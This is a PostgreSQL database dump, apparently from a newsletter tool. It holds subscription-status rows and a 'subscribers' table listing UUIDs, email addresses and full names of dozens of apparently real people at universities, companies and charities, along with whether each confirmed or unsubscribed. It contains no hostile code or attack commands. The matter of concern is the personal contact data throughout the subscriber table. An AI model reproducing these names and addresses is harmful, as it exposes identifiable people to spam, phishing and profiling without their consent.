370 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
371 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
372 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
373 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
374 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
375 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
376 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
377 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
378 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
379 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
380 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
381 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
382 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
383 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
384 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
385 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
386 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
387 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
388 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
389 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
390 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
391 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
392 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
393 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
394 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
395 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
396 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
397 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
398 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
399 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
400 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
401 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
402 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
403 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
404 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
405 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
406 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
407 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
408 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
409 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
410 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
411 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
412 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
413 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
414 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
415 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
416 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
418 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
419 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
420 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
421 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
422 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
423 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
424 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
425 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
426 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
427 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
428 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
429 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
430 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
431 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
432 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
433 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
434 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
435 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
436 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
437 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
438 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
439 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
440 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
441 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
442 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
443 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
444 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
445 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
447 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
448 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
449 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
450 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
451 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
452 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
453 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
454 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
455 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
457 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
458 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
459 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
460 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
461 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
462 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
463 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
465 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
466 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
467 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
468 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
469 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
471 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
472 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
473 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
474 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
475 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
476 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
477 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
478 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
479 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
480 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
481 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
482 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
483 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
484 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
485 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
486 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
487 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
488 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
489 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
490 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
491 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
492 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
493 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
494 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
495 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
496 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
497 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
498 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
499 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
500 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
501 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
502 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
503 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
504 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
170 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
446 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
507 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
508 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
509 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
510 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
511 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
512 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
513 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
514 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
515 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
516 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
517 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
518 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
519 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
520 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
521 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
522 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
523 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
524 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
525 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
526 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
527 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
52 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
175 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
139 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
60 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
69 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
208 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
288 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
456 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
106 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
464 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
306 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
312 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
417 3 {} confirmed 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
543 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
544 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
545 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
546 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
547 3 {} confirmed 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
548 3 {} confirmed 2026-04-27 17:56:24.068203+02 2026-04-27 17:56:36.804733+02
470 3 {} unsubscribed 2026-04-07 16:27:05.6542+02 2026-04-28 10:58:32.765131+02
550 3 {} confirmed 2026-04-29 19:46:05.786483+02 2026-04-29 19:46:16.46775+02
551 3 {} confirmed 2026-04-30 11:44:46.303607+02 2026-04-30 11:45:34.208542+02
552 3 {} confirmed 2026-05-05 22:04:37.91554+02 2026-05-06 06:15:06.662938+02
553 3 {} unconfirmed 2026-05-20 23:13:20.451361+02 2026-05-20 23:13:20.451361+02
554 3 {} unconfirmed 2026-05-22 08:11:23.597748+02 2026-05-22 08:11:23.597748+02
555 3 {} confirmed 2026-05-26 05:43:31.483107+02 2026-05-26 07:53:20.445091+02
\.
--
-- Data for Name: subscribers; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.subscribers (id, uuid, email, name, attribs, status, created_at, updated_at) FROM stdin;
1 add063a5-7331-48c6-b4b8-6c5a42a553c6 john@example.com John Doe {"city": "Bengaluru", "good": true, "type": "known"} enabled 2026-03-22 10:59:01.014601+01 2026-03-22 10:59:01.014601+01
2 daa5d41e-94c0-43cf-8b4b-96528cb64225 anon@example.com Anon Doe {"city": "Bengaluru", "good": true, "type": "unknown"} enabled 2026-03-22 10:59:01.018857+01 2026-03-22 10:59:01.018857+01
3 8bccdaf7-e586-4a6d-ae75-467fc28d2f10 bjornb@mailbox.org Bjornb null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
4 12949c5c-e276-44a9-b0f7-d4bc9dcf1b30 claudia@gil-com.at Claudia null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
5 c83e5a4e-08f0-4a60-82b7-e0b7520c0627 ines.gensinger@gleif.org Ines Gensinger null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
6 aa4b1dc3-3158-4493-b1ac-86bc73e7defb raphael.karl@studi.hfgg.de Raphael Karl null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
7 a0596b77-254d-46cc-b819-a1f022712432 birgit.weimert@outlook.de Birgit Weimert null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
8 a6dded30-6853-4fa3-a5e6-34599db61b40 claudia.schuetze@tt-s.com Claudia Schuetze null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
9 f3a6ea24-e81b-4d4d-be22-233ee261ae4d dr.dominik.kramer@gmail.com Dominik Kramer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
10 6d58aa43-ec40-426b-ba37-58c948ff8da9 joergbernardy@icloud.com Joergbernardy null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
11 2dc921ca-5b90-4d93-aeea-95442460192a g.horntrich@bistumlimburg.de G Horntrich null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
12 c46a7360-bd3c-4c82-95de-5cf29ceeec66 jwilsonbuf@gmail.com Jwilsonbuf null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
13 3c67e6c0-0fcd-4d55-a88d-e38968b73d6a prigrison@gmail.com Prigrison null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
14 5f46a7d1-e79c-4f89-b1ee-7c78c0e43172 sabrinakoenig@posteo.de Sabrinakoenig null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
15 b956598b-4bde-41f9-822d-8702173b428a constanze.kernbach@realutopien.de Constanze Kernbach null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
16 bad8820b-1060-4c33-9608-da228c09013e marie.bartsch@kit.edu Marie Bartsch null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
17 9b7a70b6-d5f7-48da-8d07-6380bd6d9d81 matthew4000@googlemail.com Matthew4000 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
18 fd939aa9-0310-4f08-a847-db29a6ec567b anne7494@gmail.com Annegret Storck null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
19 23630ae6-4224-4ec7-abdd-42832518362e david.schulke@caritas-nds.de David Schulke null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
20 285a2cec-1028-4539-b155-7d829fc31e34 sabine@get-responsible.de Sabine null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
21 6ff3e190-7908-463f-9d76-155dd0a55c63 loeser@art-innovation.org Loeser null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
22 10f3ddcc-164c-499b-94f9-581e37df0e86 philipp.spgl@gmail.com Philipp Spiegel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
23 053dfa70-8783-4160-b7f4-b43bd9ee9040 simonefasse@verbia.de Simonefasse null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
24 7342db82-8639-458f-aebe-2602c68d06f1 pierre.golbach11@gmail.com Pierre Golbach11 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
25 8656c746-0be9-4a93-af4a-befa1829096f julian.krauss@tum.de Julian Krauss null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
26 e17e33c7-4115-4eff-936b-047f6fb2b281 marlene.konrad@commhaconsulting.com Marlene Konrad null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
27 f2d795a7-b397-4a8a-b1f7-c08e13b4d1df stephan.hartmann@hyperisland.co.uk Stephan Hartmann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
28 41eb0ac2-118b-4f35-928d-ab38e19541dc maria.e.matthaeus@gmail.com Maria E Matthaeus null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
29 4613f436-26e7-4493-a9be-c9c128b1c8b9 noemi.scheurer@kulturkomitee.win Noemi Scheurer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
30 e4d6e0f3-d712-4204-88f6-e220e70158f3 carolinekuhn1967@gmail.com caroline kuhn null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
31 f5e44d97-607c-464a-abf3-b83c8dd64660 dana.wolf@ita-kl.de Dana Wolf null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
32 083ccb42-1c38-4960-80d1-fec7a2075321 anja.soeder@momentsofmatter.de Anja Soeder null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
33 01eb2fc2-7415-45ae-9814-2a651d755f5b alexandra.perl@stullengold.com Alexandra Perl null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
34 43bcd47f-5d72-4742-baed-0089fca9d5d9 janseyberth@gmail.com Jan Seyberth null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
35 d5bbfac9-cb98-4b98-80a5-26333dcd831c t.gruenfelder@zeppelin-university.net T Gruenfelder null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
36 5cce8e87-cc6d-4c04-8b4c-21459a81245d nikpoor.mahtab@gmail.com Mahtab Nikpour null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
37 5a4e774d-8015-46e5-95e7-d62142be09c8 kirstin-reichert@gmx.de Kirstin Reichert null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
38 d07067ec-821e-4961-97c9-12b72ccf5aa1 faizan-abbasi@live.com Faizan Abbasi null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
39 3b7fdec5-20be-4d95-9396-48ea394a541b franziska@bergeconsulting.de Franziska Berge null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
40 43de0728-1d30-414d-8f77-51cc5f05e22c justyna.doherty@iadt.ie Justyna Doherty null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
41 7ac417ba-1240-486d-a8e4-db76284d306a tferrer@stpeters.es Tferrer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
42 1cf46653-9f2b-4428-a61f-0c885cbfc940 kathrin.hassler@jacobsfoundation.org Kathrin Hassler null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
43 f9c11570-6368-469c-a792-9a08e4d10b5c liv.j.nikolaisen@uit.no Liv J Nikolaisen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
44 9af8739c-f1a9-48ba-b7de-056c39980c35 stecker@ddn-netzwerk.de Stecker null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
45 bce33955-e8ac-4e58-949f-d53d66b8ccad sankalita.shome@gmail.com Sankalita Shome null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
46 877eab6f-f99b-4672-8025-267800eb52cd niki.wiese@gmail.com Niki Wiese null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
47 3c8666fa-4a25-4e65-a2d8-5b775ff1e937 joergg@gmail.com Joergg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
48 9ba644c7-123c-44f2-bee2-42a84c57739f l.boettcher@posteo.de L Boettcher null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
49 675ac0a9-fd67-45b5-a867-9fe88848e33c helen.buchs@alice.ch Helen Buchs null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
50 432de8aa-bd72-41d5-9313-cf60b3a1d2ce antonio.caruso@zfsl-ek.de Antonio Caruso null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
51 41978316-8294-452c-8357-48896dc46b0a rietzesarah@gmail.com Rietzesarah null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
53 84252d1e-a314-417b-8ed6-cf7e014400fe martina.kampmann@4sing.com Martina Kampmann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
54 fcc5d8ff-ab20-41d8-b395-e37fe0539e84 simone.weske@dlr.de Simone Weske null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
55 73d39b95-1472-49d8-a5c4-39e406446817 bg@benedikt-gross.de Bg null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
56 ade7b389-dc1d-41a0-bc81-639d47c8249d mail@isabell-crone.de Mail null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
57 a0f1fe73-4ac4-4a82-91ef-5122511a0b99 caisserl04@gmail.com Caisserl04 null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
58 84ad459a-2fe3-4de9-b80c-6c289d25532c fl@phantastik.eu Klaudia Seibel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
59 0fceaee2-9577-4ffa-b950-58e5107a7fa6 franz-markus.peschl@univie.ac.at Markus Peschl null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
61 c07e0ac5-1019-4952-93b0-8434bdb7113a sim.engelhardt@gmail.com Sim Engelhardt null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
62 f183ad46-ca4c-489a-bb34-744d5d13fa7c prado.thays@gmail.com Prado Thays null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
63 743d413d-4065-4aff-b7e2-b3a98d95e339 lillyherde@gmail.com Lillyherde null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
64 c52c620b-f0c6-495b-a56b-3166ebaaf29a mail@timheiler.com Mail null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
65 dc769bac-638c-437c-add6-aee9023b3620 ines.kaerleber@outlook.com Ines Kaerleber null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
66 11110408-067b-41fd-b6af-44622aa85482 ina.litterst@gmail.com Ina Litterst null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
67 4d6b755f-0e5a-4e51-85e8-a855e8196ea4 paul.kuehn@hfgg.de Paul Kühn null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
68 ac9d8c82-d766-4cf8-a4da-38b70239f118 eugen_lit@hotmail.com Eugen_lit null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
70 4be653ac-954b-4d19-8ec0-85add511886e jm@relevantive.de Jm null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
71 6bb4d28c-7768-41e2-96c1-6700516f46c8 frank.truemper@quintum7.com Frank Truemper null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
72 f0c7d89a-9e52-40b6-97e4-a8481ffefc71 mb@raumtaktik.de Mb null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
73 80cde969-c195-4938-a589-b8e1f2c61987 karlheinz.pape@khpape.de Karlheinz Pape null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
74 46156c3f-d551-4d2b-8104-e111cb322520 ava.mayer@gmx.de Ava Mayer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
75 ec9c444a-5da9-4bb6-8f0e-569ee7eb358d ad@tinker-belle.de Ad null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
